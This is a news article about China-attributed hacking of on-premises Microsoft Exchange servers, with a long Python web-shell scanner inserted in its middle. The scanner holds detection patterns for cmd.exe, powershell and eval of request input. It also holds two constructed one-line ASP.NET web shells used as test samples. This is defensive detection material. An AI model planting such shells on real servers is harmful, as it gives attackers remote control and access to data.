

Chinese cyber-spies infiltrate Microsoft email servers

10 Mar 2021 / technology


A hack on Microsoft's Exchange email software has been blamed on China.

Microsoft has warned that nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.

The White House described the threat as active and said everyone running the servers needed to act now to patch them.

The US Cybersecurity and Infrastructure Security Agency (CISA) released an emergency directive telling agencies and departments to take urgent action. 

Tens of thousands of US organisations have been hacked. 

At the weekend, the US National Security Council said it was "essential that any organisation with a vulnerable server take immediate measures" to determine if they had been targeted.

Microsoft executive Tom Burt revealed the breach in a blog post that described the hackers as “state-sponsored”. 

Microsoft has released security updates to fix the flaws.

The Microsoft Threat Intelligence Centre (MSTIC) named the bad actors as Hafnium.

“Hafnium operates from China, and this is the first time we’re discussing its activity. It is a highly skilled and sophisticated actor,” Burt wrote.

Hafnium has been accused of trying to steal information from groups such as infectious-disease researchers, law firms, higher-education institutions, and defence contractors, targeting on-premises Exchange Server software (Microsoft says its cloud-hosted Exchange Online service is not affected).

Attacks

The attacks involve three steps. Firstly, the attackers gain access to an Exchange Server, either with stolen passwords or by using previously undiscovered vulnerabilities to disguise themselves as someone who should have access.

Secondly, the hackers create what’s called a web shell to control the compromised server remotely.

Thirdly, they use that remote access, run from leased virtual private servers in the US, to steal data from an organisation’s network.
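The second step is the one a defender can look for directly: a web shell is a small server-side script dropped into a directory the web server already serves, so a hunt over the Exchange front-end folders for script files that execute request-controlled input will surface it. The following Python scanner is an added example written for this article, not code from Microsoft, the Gazette or any of the sources quoted; the directory list reflects a default on-premises Exchange 2016/2019 install and is an assumption, and the three sample files it scans are constructed for the demonstration, not real captured shells.

```python
"""Added example: content-based hunt for ASP.NET web shells in Exchange
front-end directories. Directory list and sample files are assumptions."""
import re
import tempfile
from pathlib import Path

# Assumed drop locations on a default on-premises Exchange 2016/2019 install
# (the OWA/ECP auth folders and aspnet_client are served by IIS without logon).
DEFAULT_SCAN_DIRS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth",
]
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}

# Weighted indicators; a file is reported once its hits reach THRESHOLD.
# eval(Request[...]) alone is decisive: it is the classic one-line shell shape.
SHELL_INDICATORS = [
    ("eval(Request[...]) one-liner", re.compile(r"eval\s*\(\s*Request\s*[\[.]", re.I), 3),
    ("server-side script block", re.compile(r'runat\s*=\s*"?server"?', re.I), 1),
    ("process creation", re.compile(r"ProcessStartInfo|Process\.Start", re.I), 2),
    ("shell interpreter reference", re.compile(r"cmd\.exe|powershell", re.I), 1),
    ("request-controlled input", re.compile(r"Request(\.(Form|QueryString|Headers|Item))?\s*\[", re.I), 1),
]
THRESHOLD = 3


def classify(text: str):
    """Return (score, [indicator labels]) for one file's contents."""
    hits = [(label, weight) for label, pattern, weight in SHELL_INDICATORS if pattern.search(text)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def is_web_shell(text: str) -> bool:
    return classify(text)[0] >= THRESHOLD


def scan_directory(root: Path):
    """Walk root recursively and report script files whose content scores as a shell."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTENSIONS:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # locked or unreadable; skip rather than abort the sweep
        score, labels = classify(text)
        if score >= THRESHOLD:
            findings.append({
                "path": path.relative_to(root).as_posix(),
                "score": score,
                "indicators": labels,
                "mtime": path.stat().st_mtime,  # compare with the patch date during triage
            })
    return findings


# Constructed samples (not real captured files): two shells and one benign logon page.
CONSTRUCTED_SAMPLES = {
    "owa/auth/errorFF.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
    "aspnet_client/system_web/help.aspx":
        '<%@ Page Language="C#" %><script runat="server">'
        'void Page_Load(object s, EventArgs e){'
        ' var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request.Form["c"]);'
        ' System.Diagnostics.Process.Start(psi); }</script>',
    "owa/auth/logon.aspx":
        '<%@ Page Language="C#" %><html><body><form runat="server">'
        '<input name="username" /><input name="password" type="password" /></form></body></html>',
}


def demo():
    """Write the constructed samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, content in CONSTRUCTED_SAMPLES.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
        return scan_directory(root)


if __name__ == "__main__":
    for finding in demo():
        print(f'{finding["path"]}: score {finding["score"]} {finding["indicators"]}')
    # On a real server: for d in DEFAULT_SCAN_DIRS: scan_directory(Path(d))
```

A hit is a lead for triage (check the file's timestamp against when the server was patched and pull the IIS logs for requests to that path), not proof on its own; equally, a clean sweep of these folders does not prove the server was never compromised, since a shell can be dropped anywhere IIS serves and the attacker may already have moved on to credential theft. Microsoft later published its own Test-ProxyLogon.ps1 script in the CSS-Exchange repository, which also checks the Exchange HTTP proxy logs; run that alongside any content scan.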

A spokesman for the Chinese government told Reuters that the country was not behind the hack.

'Unusually aggressive'

Beijing has repeatedly rejected US accusations of cyber-crime.

Over 20,000 organisations have been compromised in the US, with many more affected worldwide, Reuters reported.

Brian Krebs, an industry expert and blogger, put the number higher, citing multiple security sources. 

"At least 30,000 organisations across the United States – including a significant number of small businesses, towns, cities and local governments – have over the past few days been hacked by an unusually aggressive Chinese cyber-espionage unit that's focused on stealing email from victim organisations,” he said.

Patches

Jake Sullivan, the White House National Security Adviser, urged network owners to download the security patches as soon as possible.

Microsoft told customers "the best protection" was "to apply updates as soon as possible across all impacted systems".

However, it also said it was deploying some mitigation techniques designed to help those who are unable to upgrade quickly, but warned they were not "a remediation if your Exchange Servers have already been compromised, nor are they full protection against attack". 

This is the eighth time in the past 12 months that Microsoft has publicly accused nation-state groups of targeting institutions critical to civil society.


Gazette Desk
Gazette.ie is the daily legal news site of the Law Society of Ireland